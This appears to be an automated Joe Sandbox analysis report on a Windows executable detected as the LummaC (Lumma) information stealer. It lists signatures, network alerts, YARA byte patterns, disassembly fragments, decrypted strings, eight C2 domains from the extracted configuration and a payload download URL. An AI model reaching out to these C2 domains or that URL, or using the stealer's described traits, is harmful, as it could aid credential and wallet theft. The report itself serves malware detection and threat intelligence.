Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XIaCqh1vRm.exe

Overview

General Information

Sample name:XIaCqh1vRm.exe
renamed because original name is a hash value
Original sample name:e94835b4d3d35d99400dfd68fe580197.exe
Analysis ID:1575128
MD5:e94835b4d3d35d99400dfd68fe580197
SHA1:fd0b6060e72be90a15c8681a01cccdf7d90df179
SHA256:1141d5ceaf0e3cddc1e1980fb60dc53e94374c6c5e43185297a7a87feb42e9b3
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • XIaCqh1vRm.exe (PID: 7736 cmdline: "C:\Users\user\Desktop\XIaCqh1vRm.exe" MD5: E94835B4D3D35D99400DFD68FE580197)
    • 3247.tmp.exe (PID: 7976 cmdline: "C:\Users\user\AppData\Local\Temp\3247.tmp.exe" MD5: D88E2431ABAC06BDF0CD03C034B3E5E3)
      • WerFault.exe (PID: 1484 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 1724 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["diffuculttan.xyz", "awake-weaves.cyou", "wrathful-jammy.cyou", "deafeninggeh.biz", "debonairnukk.xyz", "sordid-snaked.cyou", "immureprech.biz", "effecterectz.xyz"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.1856198890.0000000000BD9000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0xa58:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        00000000.00000002.3744559508.0000000000A09000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x1460:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          Click to see the 3 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.2.3247.tmp.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            3.2.3247.tmp.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              3.3.3247.tmp.exe.b30000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                3.3.3247.tmp.exe.b30000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:08:28.700029+010020283713Unknown Traffic192.168.2.1149727104.21.22.222443TCP
                  2024-12-14T14:08:33.255896+010020283713Unknown Traffic192.168.2.1149739104.21.96.1443TCP
                  2024-12-14T14:08:37.950634+010020283713Unknown Traffic192.168.2.1149754104.102.49.254443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:08:31.833197+010020546531A Network Trojan was detected192.168.2.1149727104.21.22.222443TCP
                  2024-12-14T14:08:35.496884+010020546531A Network Trojan was detected192.168.2.1149739104.21.96.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:08:31.833197+010020498361A Network Trojan was detected192.168.2.1149727104.21.22.222443TCP
                  2024-12-14T14:08:35.496884+010020498361A Network Trojan was detected192.168.2.1149739104.21.96.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:08:33.255896+010020582151Domain Observed Used for C2 Detected192.168.2.1149739104.21.96.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:08:28.700029+010020582231Domain Observed Used for C2 Detected192.168.2.1149727104.21.22.222443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:08:36.072146+010020582101Domain Observed Used for C2 Detected192.168.2.11507511.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:08:31.890380+010020582141Domain Observed Used for C2 Detected192.168.2.11600701.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:08:35.788540+010020582161Domain Observed Used for C2 Detected192.168.2.11559521.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:08:35.645792+010020582181Domain Observed Used for C2 Detected192.168.2.11537611.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:08:35.503971+010020582201Domain Observed Used for C2 Detected192.168.2.11620091.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:08:27.080742+010020582221Domain Observed Used for C2 Detected192.168.2.11506951.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:08:26.932851+010020582261Domain Observed Used for C2 Detected192.168.2.11651231.1.1.153UDP
                  2024-12-14T14:08:36.213814+010020582261Domain Observed Used for C2 Detected192.168.2.11629871.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:08:35.932103+010020582361Domain Observed Used for C2 Detected192.168.2.11499911.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:08:20.314370+010028032742Potentially Bad Traffic192.168.2.1149710104.21.56.70443TCP
                  2024-12-14T14:08:22.125562+010028032742Potentially Bad Traffic192.168.2.1149711176.113.115.1980TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T14:08:38.895332+010028586661Domain Observed Used for C2 Detected192.168.2.1149754104.102.49.254443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: XIaCqh1vRm.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEU-c/Avira URL Cloud: Label: malware
                  Source: http://176.113.115.19/ScreenUpdateSync.exeAvira URL Cloud: Label: malware
                  Source: https://wrathful-jammy.cyou/zAvira URL Cloud: Label: malware
                  Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEQAvira URL Cloud: Label: malware
                  Source: https://immureprech.biz/apixAvira URL Cloud: Label: malware
                  Source: https://post-to-me.com/track_prt.php?sub=0&cc=DE6Avira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exeAvira: detection malicious, Label: HEUR/AGEN.1312567
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeAvira: detection malicious, Label: HEUR/AGEN.1312567
                  Found malware configuration
                  Source: 3.3.3247.tmp.exe.b30000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["diffuculttan.xyz", "awake-weaves.cyou", "wrathful-jammy.cyou", "deafeninggeh.biz", "debonairnukk.xyz", "sordid-snaked.cyou", "immureprech.biz", "effecterectz.xyz"], "Build id": "4h5VfH--"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exeReversingLabs: Detection: 42%
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeReversingLabs: Detection: 42%
                  Multi AV Scanner detection for submitted file
                  Source: XIaCqh1vRm.exeVirustotal: Detection: 41%Perma Link
                  Source: XIaCqh1vRm.exeReversingLabs: Detection: 47%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: XIaCqh1vRm.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
                  Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
                  Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
                  Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
                  Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
                  Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmpString decryptor: effecterectz.xyz
                  Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
                  Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmpString decryptor: immureprech.biz
                  Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
                  Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                  Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                  Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                  Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                  Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmpString decryptor: 4h5VfH--

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeUnpacked PE file: 0.2.XIaCqh1vRm.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeUnpacked PE file: 3.2.3247.tmp.exe.400000.0.unpack
                  Source: XIaCqh1vRm.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.11:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.11:49727 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49739 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.11:49754 version: TLS 1.2
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024C8C59 FindFirstFileExW,0_2_024C8C59
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h3_2_0043CD60
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp al, 2Eh3_2_00426054
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then jmp eax3_2_00426054
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B05D
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B05D
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B068
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B068
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]3_2_0040E83B
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B05B
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B05B
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0040A940
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov edx, ecx3_2_0040A940
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]3_2_0040C917
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then jmp ecx3_2_0043C1F0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_00425990
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx ecx, di3_2_00425990
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B195
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi]3_2_0043B9A1
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh3_2_004369A0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]3_2_0041E9B0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_004299B0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]3_2_0042526A
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ebx, edi3_2_0041D270
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov esi, eax3_2_00423A34
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h3_2_0043D2F0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edx, word ptr [eax]3_2_0043D2F0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then jmp ecx3_2_0043C280
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]3_2_00415298
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov word ptr [eax], dx3_2_00415298
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0043AAB2
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h3_2_004252BA
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h3_2_004252BA
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov eax, ebx3_2_0041CB05
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h3_2_0043CB20
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov edx, eax3_2_00427326
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_004143C2
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov edi, dword ptr [esp+34h]3_2_004143C2
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0042A3D0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042C45C
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ebp, dword ptr [eax]3_2_00436C00
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_0042B4FC
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042B4FC
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]3_2_00418578
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov edx, eax3_2_0042750D
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00421D10
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]3_2_0040DD25
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, edx3_2_0040BDC9
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]3_2_00417582
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]3_2_00427DA2
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h3_2_004205B0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C64A
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042AE48
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then jmp eax3_2_00426E50
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_0042B4F7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042B4F7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042AE24
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00433630
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C6E4
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]3_2_00425E90
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h3_2_0043CE90
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004166A0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041BEA0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042ADF4
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov eax, edx3_2_0041C6BB
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then jmp eax3_2_0043BF40
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]3_2_00415F66
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h3_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]3_2_0043A777
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]3_2_00409700
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]3_2_00409700
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]3_2_00409700
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C726
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C735
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0040CFF3
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]3_2_0040CFF3
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov byte ptr [ebp+00h], al3_2_0041DF80
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_0040D7A2
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_0040D7A2
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00B0B0AF
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00B0B08B
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h3_2_00B1D0F7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]3_2_00B060F7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then jmp eax3_2_00B070E4
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, edx3_2_00AEC030
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov byte ptr [ebp+00h], al3_2_00AFE1E7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00B0B05B
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_00B1B2C4
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_00B1B2C4
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_00B1B2CF
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_00B1B2CF
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then jmp eax3_2_00B1C268
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_00AED25A
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]3_2_00AED25A
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp al, 2Eh3_2_00B063B6
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_00B1B3FC
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_00B1B2C2
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_00B1B2C2
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]3_2_00B054D1
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ebx, edi3_2_00AFD4D7
